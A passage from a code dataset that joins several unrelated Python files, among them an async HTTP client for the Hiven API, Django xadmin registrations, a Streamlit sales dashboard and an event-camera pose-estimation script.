import load_env, utils, exception as errs\n\nlogger = logging.getLogger(__name__)\n\n# Hiven API endpoint formatting\nrequest_url_format = \"https://{0}/{1}\"\n\n# Loading the environment variables\nload_env()\n# Setting the default values to the currently set defaults in the openhivenpy.env file\n_default_host = os.getenv(\"HIVEN_HOST\")\n_default_api_version = os.getenv(\"HIVEN_API_VERSION\")\n\n\nclass HTTP:\n    \"\"\"\n    HTTP-Client for requests and interaction with the Hiven API\n    \"\"\"\n    def __init__(self,\n                 token: str,\n                 *,\n                 event_loop: typing.Optional[asyncio.AbstractEventLoop],\n                 host: typing.Optional[str] = _default_host,\n                 api_version: typing.Optional[str] = _default_api_version):\n        \"\"\"\n        Object Instance Construction\n\n        :param token: Authorisation Token for Hiven\n        :param event_loop: Event loop that will be used to execute all async functions. Will use\n                           'asyncio.get_event_loop()' to fetch the EventLoop. Will create a new one if no\n                           one was created yet\n        :param host: Url for the API which will be used to interact with Hiven.\n                     Defaults to the pre-set environment host (api.hiven.io)\n        :param api_version: Version string for the API Version. Defaults to the pre-set environment version (v1)\n        \"\"\"\n        self._token = token\n        self.host = host\n        self.api_version = api_version\n        self.api_url = request_url_format.format(self.host, self.api_version)\n        self.headers = {\"Authorization\": self._token, \"Host\": self.host}  # Default header used for requests\n        self._ready = False\n        self._session = None  # Will be created during start of connection\n        self._event_loop = event_loop\n\n        # Last/Currently executed request\n        self._request = None\n\n    def __str__(self) -> str:\n        return repr(self)\n\n    def __repr__(self) -> str:\n        info = [\n            ('ready', self.ready),\n            ('host', self.host),\n            ('api_version', self.api_version),\n            ('headers', self.headers)\n        ]\n        return '<HTTP {}>'.format(' '.join('%s=%s' % t for t in info))\n\n    @property\n    def ready(self):\n        return self._ready\n\n    @property\n    def session(self):\n        return self._session\n\n    @property\n    def event_loop(self):\n        return self._event_loop\n\n    async def connect(self) -> typing.Union[aiohttp.ClientSession, None]:\n        \"\"\"\n        Establishes a connection to Hiven for the HTTP client\n\n        :return: The created aiohttp.ClientSession\n        \"\"\"\n        try:\n            async def on_request_start(session, trace_config_ctx, params):\n                logger.debug(f\"[HTTP] >> Request with HTTP {params.method} started at {time.time()}\")\n                logger.debug(f\"[HTTP] >> URL >> {params.url}\")\n\n            async def on_request_end(session, trace_config_ctx, params):\n                logger.debug(f\"[HTTP] << Request with HTTP {params.method} finished!\")\n                logger.debug(f\"[HTTP] << Header << {params.headers}\")\n                logger.debug(f\"[HTTP] << URL << {params.url}\")\n                logger.debug(f\"[HTTP] << Response << {params.response}\")\n\n            async def on_request_exception(session, trace_config_ctx, params):\n                logger.debug(f\"[HTTP] << An exception occurred while executing the request\")\n\n            async def on_request_redirect(session, trace_config_ctx, params):\n                logger.debug(f\"[HTTP] << REDIRECTING with URL {params.url} and HTTP {params.method}\")\n\n            async def on_response_chunk_received(session, trace_config_ctx, params):\n                logger.debug(f\"[HTTP] << Chunk Received << {params.chunk}\\n\")\n\n            async def on_connection_queued_start(session, trace_config_ctx, params):\n                logger.debug(f\"[HTTP] >> HTTP {params.method} with {params.url} queued!\")\n\n            trace_config = aiohttp.TraceConfig()\n            trace_config.on_request_start.append(on_request_start)\n            
trace_config.on_request_end.append(on_request_end)\n trace_config.on_request_exception.append(on_request_exception)\n trace_config.on_request_redirect.append(on_request_redirect)\n trace_config.on_connection_queued_start.append(on_connection_queued_start)\n trace_config.on_response_chunk_received.append(on_response_chunk_received)\n\n self._session = aiohttp.ClientSession(trace_configs=[trace_config])\n self._ready = True\n\n resp = await self.request(\"/users/@me\", timeout=30)\n if resp:\n logger.info(\"[HTTP] Session was successfully created!\")\n return self.session\n else:\n # If the request failed it will return None and log a warning\n logger.warning(\"[HTTP] Test Request for HTTP Initialisation failed! \")\n return None\n\n except Exception as e:\n utils.log_traceback(msg=\"[HTTP] Traceback:\",\n suffix=\"Failed to create HTTP-Session: \\n\"\n f\"> {sys.exc_info()[0].__name__}: {e}\")\n self._ready = False\n await self.session.close()\n raise errs.SessionCreateError(f\"Failed to create HTTP-Session! > {sys.exc_info()[0].__name__}: {e}\") from e\n\n async def close(self) -> bool:\n \"\"\"\n Closes the HTTP session that is currently connected to Hiven!\n\n :return: True if it was successful else False\n \"\"\"\n try:\n await self.session.close()\n self._ready = False\n return True\n\n except Exception as e:\n utils.log_traceback(msg=\"[CONNECTION] Traceback:\")\n logger.critical(f\"[HTTP] Failed to close HTTP Session: {sys.exc_info()[0].__name__}: {e}\")\n return False\n\n async def raw_request(\n self,\n endpoint: str,\n *,\n method: typing.Optional[str] = \"GET\",\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None, # Defaults to an empty header\n **kwargs) -> typing.Union[aiohttp.ClientResponse, None]:\n \"\"\"\n Wrapped HTTP request for a specified endpoint.\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param method: HTTP Method that should be used to perform the request\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the aiohttp.ClientResponse object\n \"\"\"\n async def http_request(_endpoint: str,\n _method: str,\n _json: dict,\n _headers: dict,\n **_kwargs) -> typing.Union[aiohttp.ClientResponse, None]:\n \"\"\"\n The Function that stores the request and the handling of exceptions! Will be used as\n a variable so the status of the request can be seen by the asyncio.Task status!\n\n :param _endpoint: Endpoint of the request\n :param _method: HTTP method of the request\n :param _json: Additional JSON Data if it exists\n :param _headers: Headers that will be sent! Defaults to the ones that were created during initialisation\n :param _kwargs: Additional Parameter for the aiohttp HTTP Request\n :return: Returns the aiohttp.ClientResponse object\n \"\"\"\n if self._ready:\n try:\n # Creating a new ClientTimeout Instance which will default to having no timeout since\n # errors occurred using it! 
Timeout is therefore handled independently over the _time_out_handler()\n                    _timeout = aiohttp.ClientTimeout(total=None)\n\n                    # If no default headers were passed\n                    if _headers is None:\n                        _headers = self.headers\n\n                    url = f\"{self.api_url}{_endpoint}\"\n                    async with self.session.request(\n                            method=_method,  # HTTP Method\n                            url=url,  # Endpoint url\n                            headers=_headers,  # Passing the headers directly without using the kwargs\n                            timeout=_timeout,  # Timeout Object => defaults to None since it caused issues in the past!\n                            json=_json,\n                            **_kwargs) as _resp:\n\n                        http_resp_code = _resp.status  # HTTP Code Response\n                        data = await _resp.read()  # Raw Text data\n\n                        if data:\n                            _json_data = json_decoder.loads(data)  # Loading the data in json => will fail if not json\n                            _success = _json_data.get('success')  # Fetching the success item <== bool\n\n                            if _success:\n                                logger.debug(\n                                    f\"[HTTP] {http_resp_code} - Request was successful and received expected data!\")\n                            else:\n                                # If an error occurred the response body will contain an error field\n                                _error = _json_data.get('error')\n                                if _error:\n                                    err_code = _error.get('code')  # Error-Code\n                                    err_msg = _error.get('message')  # Error-Msg\n                                    logger.error(f\"[HTTP] Failed HTTP request '{_method.upper()}'! {http_resp_code} -> \"\n                                                 f\"'{err_code}': '{err_msg}'\")\n                                else:\n                                    logger.error(f\"[HTTP] Failed HTTP request '{_method.upper()}'! {http_resp_code} -> \"\n                                                 f\"Response: None\")\n                        else:\n                            # Empty Responses are generally unexpected for an Hiven API Response and therefore are\n                            # counted as possible issues if the code is 204. If not it's an exception since data was\n                            # expected but not received!\n                            if http_resp_code == 204:\n                                logger.debug(\"[HTTP] Received empty response!\")\n                            else:\n                                logger.error(\"[HTTP] Received empty response!\")\n\n                        return _resp\n\n                except Exception as _e:\n                    utils.log_traceback(msg=\"[HTTP] Traceback:\",\n                                        suffix=f\"HTTP '{_method.upper()}' failed with endpoint: {_endpoint}: \\n\"\n                                               f\"{sys.exc_info()[0].__name__}, {_e}\")\n\n            else:\n                logger.error(f\"[HTTP] << The HTTPClient was not ready when trying to perform request with \"\n                             f\"HTTP {_method}! The session is either not initialised or closed!\")\n                return None\n\n        self._request = asyncio.create_task(http_request(endpoint, method, json, headers, **kwargs))\n        try:\n            http_client_response = await asyncio.wait_for(self._request, timeout=timeout)\n\n        except asyncio.CancelledError:\n            logger.warning(f\"[HTTP] >> Request '{method.upper()}' for endpoint '{endpoint}' was cancelled!\")\n            return\n\n        except asyncio.TimeoutError:\n            logger.warning(f\"[HTTP] >> Request '{method.upper()}' for endpoint '{endpoint}' timed out after {timeout}s!\")\n            http_client_response = None\n\n        except Exception as e:\n            utils.log_traceback(msg=\"[HTTP] Traceback:\",\n                                suffix=f\"HTTP '{method.upper()}' failed with endpoint: {self.host}{endpoint}: \\n\"\n                                       f\"{sys.exc_info()[0].__name__}: {e}\")\n            raise errs.HTTPError(f\"HTTP '{method.upper()}' failed with endpoint: \"\n                                 f\"{self.host}{endpoint}: {sys.exc_info()[0].__name__}: {e}\")\n\n        # Returning the response instance\n        return http_client_response\n\n    async def request(self,\n                      endpoint: str,\n                      *,\n                      json: typing.Optional[dict] = None,\n                      timeout: typing.Optional[int] = 15,\n                      headers: typing.Optional[dict] = None,\n                      **kwargs) -> typing.Union[dict, None]:\n        \"\"\"\n        Wrapped HTTP 'GET' request for a specified endpoint, which returns only the response data!\n        \n        :param endpoint: Url place in url format '/../../..' 
Will be appended to the standard link:\n                         'https://api.hiven.io/{version}'\n        :param json: JSON format data that will be appended to the request\n        :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n        :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n                        Use with caution!\n        :param kwargs: Other parameter for requesting.\n                       See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n        :return: A python dictionary containing the response data if successful and else returns `None`\n        \"\"\"\n        resp = await self.raw_request(endpoint, method=\"GET\", timeout=timeout, json=json, headers=headers, **kwargs)\n        if resp is not None and resp.status < 300 and resp.status != 204:\n            # Returning the data in json format (dict)\n            return await resp.json()\n        else:\n            return None\n\n    async def get(self,\n                  endpoint: str,\n                  *,\n                  json: typing.Optional[dict] = None,\n                  timeout: typing.Optional[int] = 15,\n                  headers: typing.Optional[dict] = None,\n                  **kwargs) -> aiohttp.ClientResponse:\n        \"\"\"\n        Wrapped HTTP 'GET' request for a specified endpoint\n\n        :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n                         'https://api.hiven.io/{version}'\n        :param json: JSON format data that will be appended to the request\n        :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n        :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n                        Use with caution!\n        :param kwargs: Other parameter for requesting.\n                       See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n        :return: Returns the ClientResponse object if successful and else returns `None`\n        \"\"\"\n        return await self.raw_request(\n            endpoint,\n            method=\"GET\",\n            json=json,\n            headers=headers,\n            timeout=timeout,\n            **kwargs)\n\n    async def post(self,\n                   endpoint: str,\n                   *,\n                   json: typing.Optional[dict] = None,\n                   timeout: typing.Optional[int] = 15,\n                   headers: typing.Optional[dict] = None,\n                   **kwargs) -> aiohttp.ClientResponse:\n        \"\"\"\n        Wrapped HTTP 'POST' for a specified endpoint.\n        \n        :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n                         'https://api.hiven.io/{version}'\n        :param json: JSON format data that will be appended to the request\n        :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n        :param headers: Defaults to the normal headers. 
Note: Changing content type can make the request break.\n                        Use with caution!\n        :param kwargs: Other parameter for requesting.\n                       See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n        :return: Returns the ClientResponse object if successful and else returns `None`\n        \"\"\"\n        # If no custom headers were passed a new one will be created and used\n        if headers is None:\n            # Creating a duplicate header of the default one\n            headers = dict(self.headers)\n\n            # Requires the Content-Type to be specified since else it cannot\n            # recognise the json-data in the body!\n            headers['Content-Type'] = 'application/json'\n\n        return await self.raw_request(\n            endpoint,\n            method=\"POST\",\n            json=json,\n            headers=headers,\n            timeout=timeout,\n            **kwargs)\n\n    async def delete(self,\n                     endpoint: str,\n                     *,\n                     json: typing.Optional[dict] = None,\n                     timeout: typing.Optional[int] = 15,\n                     headers: typing.Optional[dict] = None,\n                     **kwargs) -> aiohttp.ClientResponse:\n        \"\"\"\n        Wrapped HTTP 'DELETE' for a specified endpoint.\n        \n        :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n                         'https://api.hiven.io/{version}'\n        :param json: JSON format data that will be appended to the request\n        :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n        :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n                        Use with caution!\n        :param kwargs: Other parameter for requesting.\n                       See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n        :return: Returns the ClientResponse object if successful and else returns `None`\n        \"\"\"\n        return await self.raw_request(\n            endpoint,\n            method=\"DELETE\",\n            json=json,\n            timeout=timeout,\n            headers=headers,\n            **kwargs)\n\n    async def put(self,\n                  endpoint: str,\n                  *,\n                  json: typing.Optional[dict] = None,\n                  timeout: typing.Optional[int] = 15,\n                  headers: typing.Optional[dict] = None,\n                  **kwargs) -> aiohttp.ClientResponse:\n        \"\"\"\n        Wrapped HTTP 'PUT' for a specified endpoint.\n        \n        Similar to post, but idempotent: sending the same request several times has the same effect as sending it once\n\n        :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n                         'https://api.hiven.io/{version}'\n        :param json: JSON format data that will be appended to the request\n        :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n        :param headers: Defaults to the normal headers. 
Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the ClientResponse object if successful and else returns `None`\n \"\"\"\n # If no custom headers were passed a new one will be created and used\n if headers is None:\n # Creating a duplicate header of the default one\n headers = dict(self.headers)\n\n # Requires the Content-Type to be specified since else it cannot\n # recognise the json-data in the body!\n headers['Content-Type'] = 'application/json'\n\n return await self.raw_request(\n endpoint,\n method=\"PUT\",\n json=json,\n timeout=timeout,\n headers=headers, # Passing the new header for the request\n **kwargs)\n\n async def patch(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> aiohttp.ClientResponse:\n \"\"\"\n Wrapped HTTP 'PATCH' for a specified endpoint.\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the ClientResponse object if successful and else returns `None`\n \"\"\"\n # If no custom headers were passed a new one will be created and used\n if headers is None:\n # Creating a duplicate header of the default one\n headers = dict(self.headers)\n\n # Requires the Content-Type to be specified since else it cannot\n # recognise the json-data in the body!\n headers['Content-Type'] = 'application/json'\n\n return await self.raw_request(\n endpoint,\n method=\"PATCH\",\n json=json,\n headers=headers,\n timeout=timeout,\n **kwargs)\n\n async def options(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> aiohttp.ClientResponse:\n \"\"\"\n Wrapped HTTP 'OPTIONS' for a specified endpoint.\n \n Requests permission for performing communication with a URL or server\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. 
Note: Changing content type can make the request break.\n                        Use with caution!\n        :param kwargs: Other parameter for requesting.\n                       See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n        :return: Returns the ClientResponse object if successful and else returns `None`\n        \"\"\"\n        return await self.raw_request(\n            endpoint,\n            method=\"OPTIONS\",\n            json=json,\n            headers=headers,\n            timeout=timeout,\n            **kwargs)\n","sub_path":"openhivenpy/gateway/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":24092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"417955001","text":"import xadmin\n\nfrom .models import UserMessage, VideoComments, UserFavorite\n\n\nclass UserMessageAdmin(object):\n    '''User message admin'''\n\n    list_display = ['user', 'message', 'has_read', 'add_time']\n    search_fields = ['user', 'message', 'has_read']\n    list_filter = ['user', 'message', 'has_read', 'add_time']\n\n\n\nclass VideoCommentsAdmin(object):\n    '''User comment admin'''\n\n    list_display = ['user', 'course', 'comments', 'add_time']\n    search_fields = ['user', 'course', 'comments']\n    list_filter = ['user', 'course', 'comments', 'add_time']\n\n\n\nclass UserFavoriteAdmin(object):\n    '''User favorite admin'''\n\n    list_display = ['user', 'fav_id', 'add_time']\n    search_fields = ['user', 'fav_id']\n    list_filter = ['user', 'fav_id', 'add_time']\n\n\n# Register the admin classes with their models.\nxadmin.site.register(UserMessage, UserMessageAdmin)\nxadmin.site.register(VideoComments, VideoCommentsAdmin)\nxadmin.site.register(UserFavorite, UserFavoriteAdmin)","sub_path":"operation/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"333235498","text":"\nimport pandas as pd\nimport streamlit as st\nimport altair as alt\n\ndf = pd.read_csv('~/Projects/general_learning/Quantium/QVI_data.csv')\ndf.info()\n\nst.write(\"\"\"\n# Sales Analysis\n\nThis app shows the sales changes over the period\n\"\"\")\n\ndf['year_month'] = pd.to_datetime(df['DATE']).dt.floor('d') - pd.offsets.MonthBegin(1)\ndf = df.groupby([\"year_month\", \"LIFESTAGE\"])[\"TOT_SALES\"].sum().reset_index()\n\ndf = pd.pivot_table(df, values=\"TOT_SALES\", index=\"LIFESTAGE\", columns=\"year_month\")\n\nst.sidebar.header('Input Features')\nst.sidebar.subheader('Choose PREMIUM_CUSTOMER')\n\n\nstores = st.multiselect(\n    \"Choose Lifestages\", list(df.index), [\"YOUNG FAMILIES\", \"OLDER FAMILIES\"]\n)\n\ndata = df.loc[stores]\nst.write(\"### Show Chosen Lifestages\", data.sort_index())\n\ndata = data.T.reset_index()\ndata = pd.melt(data, id_vars=[\"year_month\"])\n\nchart = (\n    alt.Chart(data)\n    .mark_area(opacity=0.3)\n    .encode(\n        x=\"year_month:T\",\n        y=alt.Y(\"value:Q\", stack=None),\n        color=\"LIFESTAGE:N\",\n    )\n)\nst.altair_chart(chart, use_container_width=True)\n\n\n","sub_path":"DS Learning/sales_dashboard.py","file_name":"sales_dashboard.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"398604036","text":"#!/usr/bin/env python\n# -*- coding=utf8 -*-\n\nimport numpy as np\nimport sys\nsys.path.append('../utils/')\nfrom dataproc import *\nfrom datetime import datetime\n\n\n# Keys are the raw gender strings in the input data: '男' = male, '女' = female\ngender_encoder = DictTable({u'男': 0, u'女': 1})\n\n\ndef day_diff(d1, d2):\n    d1 = datetime.strptime(d1, \"%d/%m/%Y\")\n    d2 = datetime.strptime(d2, \"%d/%m/%Y\")\n    return abs((d2 - d1).days)\n\n\ndef gender_transform(gender_cf):\n    idx = 
gender_encoder.lookup(gender_cf)\n    if idx[0] is None:\n        return ['']\n    else:\n        return idx\n\n\ndef date_transform(dt):\n    res = []\n    for d in dt:\n        res.append(day_diff(d, '01/09/2017'))\n    return res\n\n\ndef drop_cf(cf, st, ed):\n    return cf[:st] + cf[ed:]\n\n\ndef extend_cf(cf, st, ed, foo):\n    return cf[:st] + foo(cf[st:ed]) + cf[ed:]\n\n\ndef cf2libsvm(label, cf):\n    fstr = ''\n    for idx, val in enumerate(cf):\n        if val != '':\n            fstr += str(idx+1) + ':' + str(val) + ' '\n    if label == '':\n        label = '0'\n    return label + ' ' + fstr.rstrip(' ')\n\n\nif __name__ == '__main__':\n    ifile = open(sys.argv[1])\n    ofile = open(sys.argv[2], 'w')\n    for ln in ifile:\n        flds = ln.decode('utf8').rstrip('\\n').split('\\t')\n        label = flds[0]\n        feats = flds[1:]\n        #feats = drop_cf(feats, 3, 4)\n        feats = extend_cf(feats, 3, 4, date_transform)\n        feats = extend_cf(feats, 1, 2, gender_transform)\n        print >> ofile, cf2libsvm(label, feats)\n    ifile.close()\n    ofile.close()\n","sub_path":"gbdt_1/3_Feature.py","file_name":"3_Feature.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"439319196","text":"from tap_lever.streams.base import BaseStream\nfrom tap_lever.streams import cache as stream_cache\n\nimport singer\n\nLOGGER = singer.get_logger()  # noqa\n\n\nclass CandidateApplicationsStream(BaseStream):\n    API_METHOD = 'GET'\n    TABLE = 'candidate_applications'\n\n    @property\n    def path(self):\n        return '/candidates/{candidate_id}/applications'\n\n    def get_url(self, candidate):\n        _path = self.path.format(candidate_id=candidate)\n        return 'https://api.lever.co/v1{}'.format(_path)\n\n    def sync_data(self):\n        table = self.TABLE\n\n        candidates = stream_cache.get('candidates')\n        LOGGER.info(\"Found {} candidates in cache\".format(len(candidates)))\n\n        params = self.get_params(_next=None)\n        for i, candidate in enumerate(candidates):\n            LOGGER.info(\"Fetching applications for candidate {} of {}\".format(i + 1, len(candidates)))\n            candidate_id = candidate['id']\n            url = self.get_url(candidate_id)\n            resources = self.sync_paginated(url, params)\n","sub_path":"tap_lever/streams/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"253909557","text":"'''\r\nCreated on Sep 10, 2015\r\n\r\n@author: scale 87762\r\n'''\r\ndef exceptioncontent():\r\n    yoursmart=False\r\n    while(yoursmart == False):\r\n        try:\r\n            a=int(input(\"Tell me your age\"))\r\n            print(\"You were born in the year\", 2015-a)\r\n            yoursmart=True\r\n        except:\r\n            print(\"You gave me a string\")\r\nexceptioncontent()","sub_path":"PythonLabs/TryPractice.py","file_name":"TryPractice.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"633722928","text":"from pathlib import Path\nimport imageio\nfrom imageio import imwrite\nfrom skimage.color import hsv2rgb\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\n\nimport h5py\nimport copy\nimport cv2\nimport sys\n\nfrom util import *\n\n\n\nskip_frames = 1\noffset_img_idx = 1968\ntotal_num_frames = 26605\nsensor_size = np.array([260, 346])\npadding = np.array([2, 5])\ncropped_size = sensor_size - 2 * padding\ncamIntrinsic = np.array([[223.9940010790056, 0, 170.7684322973841], [0, 223.61783486959376, 128.18711828338436], [0, 0, 1]])\n\n\n\nevents_path = \
\"/mnt/Data1/dataset/evflow-data/outdoor_day2/h5_events/outdoor_day2_data.h5\"\n# image_ts_path = \"/mnt/Data1/dataset/evflow-data/outdoor_day2/outdoor_day2_data.hdf5\" # outdoor2\ngt_path = \"/mnt/Data1/dataset/evflow-data/outdoor_day2/outdoor_day2_gt.hdf5\" # outdoor2\npre_gen_flow = \"/mnt/Data3/outdoor_day2_tf_output_trim_skip1.h5\"\n# pre_gen_flow = \"/mnt/Data2/EV_FlowNet_daniilidis/outdoor_day2_tf_output_trim_skip4.h5\"\n\n\n\n\n# gt_trans = np.empty([1, 3])\ngt_camera_frame = []\npredict_camera_frame = []\n\nwith h5py.File(pre_gen_flow, \"r\") as h5_file:\n for i in range(1, total_num_frames-skip_frames, skip_frames):\n\n if i < 400: continue\n if i > 440: break\n\n # Get events timestamp\n start_t = h5_file[\"prev_images\"][\"image{:09d}\".format(i)].attrs['timestamp']\n end_t = h5_file[\"next_images\"][\"image{:09d}\".format(i)].attrs['timestamp']\n start_ev_idx = binary_search_h5_timestamp(events_path, 0, None, start_t)\n end_ev_idx = binary_search_h5_timestamp(events_path, 0, None, end_t)\n\n # Get flow estimates\n flow = np.array(h5_file[\"flows\"][\"flow{:09d}\".format(i)])\n flow_img = vis_flow(flow)\n flow_img[-50:, -50:] = draw_color_wheel_np(50, 50)\n flow_mask = (np.abs(flow[:, :, 0]) > 0.01) & (np.abs(flow[:, :, 1]) > 0.01)\n\n # Get events\n events = get_events_by_idx(events_path, start_ev_idx, end_ev_idx)\n pos = get_pos_events(events)\n neg = get_neg_events(events)\n pos = crop_car_events(crop_center_events(pos, sensor_size, trim_size=padding))\n neg = crop_car_events(crop_center_events(neg, sensor_size, trim_size=padding))\n\n # Move events forward and backward\n pos_backward = move_flow_with_time(flow, pos, cropped_size, forward=False)\n pos_forward = move_flow_with_time(flow, pos, cropped_size, forward=True)\n neg_backward = move_flow_with_time(flow, neg, cropped_size, forward=False)\n neg_forward = move_flow_with_time(flow, neg, cropped_size, forward=True)\n\n # Get correpsondence points and R, t\n p1, p2 = get_random_selected_correspondence_points(pos_backward, pos_forward, num_track_points=100, mask=flow_mask)\n # n1, n2 = get_random_selected_correspondence_points(neg_backward, neg_forward, num_track_points=200, mask=flow_mask)\n # pt1 = np.vstack([p1, n1])\n # pt2 = np.vstack([p2, n2])\n\n E, mask = cv2.findEssentialMat(p1, p2, cameraMatrix=camIntrinsic, method=cv2.RANSAC, prob=0.999, threshold=1.5)\n points, R, t, mask = cv2.recoverPose(E, p1, p2, mask=mask)\n\n gt_pt1_idx = binary_search_h5_gt_timestamp(gt_path, 0, None, start_t, side='right')\n gt_pt2_idx = binary_search_h5_gt_timestamp(gt_path, 0, None, end_t, side='right')\n\n # Get ground truth\n with h5py.File(gt_path, \"r\") as gt_file:\n gt_pose = gt_file['davis']['left']['pose']\n gt_ts = gt_file['davis']['left']['pose_ts']\n\n gt_pt1_interp_begin_t = gt_ts[gt_pt1_idx]\n gt_pt1_interp_end_t = gt_ts[gt_pt1_idx + 1]\n gt_pt2_interp_begin_t = gt_ts[gt_pt2_idx]\n gt_pt2_interp_end_t = gt_ts[gt_pt2_idx + 1]\n\n gt_pose1_interp_begin = gt_pose[gt_pt1_idx]\n gt_pose1_interp_end = gt_pose[gt_pt1_idx + 1]\n gt_pose2_interp_begin = gt_pose[gt_pt2_idx]\n gt_pose2_interp_end = gt_pose[gt_pt2_idx + 1]\n\n ratio1 = (gt_pt1_interp_end_t - start_t) / (gt_pt1_interp_end_t - gt_pt1_interp_begin_t)\n ratio2 = (gt_pt2_interp_end_t - end_t) / (gt_pt2_interp_end_t - gt_pt2_interp_begin_t)\n twc1 = ratio1 * gt_pose1_interp_begin[0:3, 3] + (1 - ratio1) * gt_pose1_interp_end[0:3, 3]\n twc2 = ratio2 * gt_pose2_interp_begin[0:3, 3] + (1 - ratio2) * gt_pose2_interp_end[0:3, 3]\n\n twc1 = 
interp_rigid_matrix(gt_pose1_interp_begin, \n gt_pose1_interp_end, \n gt_pt1_interp_begin_t, \n gt_pt1_interp_end_t, \n start_t)\n\n twc2 = interp_rigid_matrix(gt_pose2_interp_begin, \n gt_pose2_interp_end, \n gt_pt2_interp_begin_t, \n gt_pt2_interp_end_t, \n end_t)\n\n t_c1_c2 = np.linalg.inv(twc1) @ twc2\n gt_camera_frame.append(t_c1_c2)\n\n # scale t\n t *= np.linalg.norm(twc2 - twc1)\n\n if i < 405:\n print(np.linalg.norm(twc2 - twc1))\n\n S = np.eye(4)\n S[0:3, 0:3] = R\n S[0:3, 3] = np.squeeze(t)\n predict_camera_frame.append(S)\n\n # raise\n\n # Visualize images, flow and event images\n rgb_img = np.array(h5_file[\"prev_images\"][\"image{:09d}\".format(i)])\n rgb_img = np.tile(rgb_img[..., np.newaxis], [1, 1, 3])\n\n pos_original = vis_events(pos, cropped_size)\n pos_backward_img = vis_events(pos_backward, cropped_size)\n pos_forward_img = vis_events(pos_forward, cropped_size)\n\n # neg_original = vis_events(neg, cropped_size)\n # neg_backward_img = vis_events(neg_backward, cropped_size)\n # neg_forward_img = vis_events(neg_forward, cropped_size)\n top = np.hstack([pos_original, rgb_img, flow_img])\n bot = np.hstack([pos_backward_img, pos_forward_img, pos_backward_img - pos_forward_img])\n\n # Draw correspondence points\n for pt1, pt2 in zip(p1, p2):\n x1, y1 = pt1\n x2, y2 = pt2\n\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2 + cropped_size[1])\n y2 = int(y2)\n \n color = np.random.randint(0, 255, size=(1, 3), dtype=np.uint8).squeeze()\n color = (int(color [0]), int(color[1]), int(color[2]))\n bot = cv2.circle(bot, (x1, y1), radius=3, color=color, thickness=1)\n bot = cv2.circle(bot, (x2, y2), radius=3, color=color, thickness=1)\n bot = cv2.line(bot, (x1,y1), (x2,y2), color=color, thickness=1)\n\n img = np.vstack([top, bot])\n cv2.imshow(\"img\", img)\n cv2.waitKey(1)\n\n\n\ngt_camera_frame = np.array(gt_camera_frame)\npredict_camera_frame = np.array(predict_camera_frame)\n\nfor i in range(len(gt_camera_frame)-1):\n\n q_i = gt_camera_frame[i]\n q_i_1 = gt_camera_frame[i+1]\n q_i_inv = np.linalg.inv(q_i)\n\n p_i = predict_camera_frame[i]\n p_i_1 = predict_camera_frame[i+1]\n p_i_inv = np.linalg.inv(p_i)\n\n ei = np.linalg.inv(q_i_inv @ q_i_1) @ (p_i_inv @ p_i_1)\n\n trans = ei[0:3, 3]\n 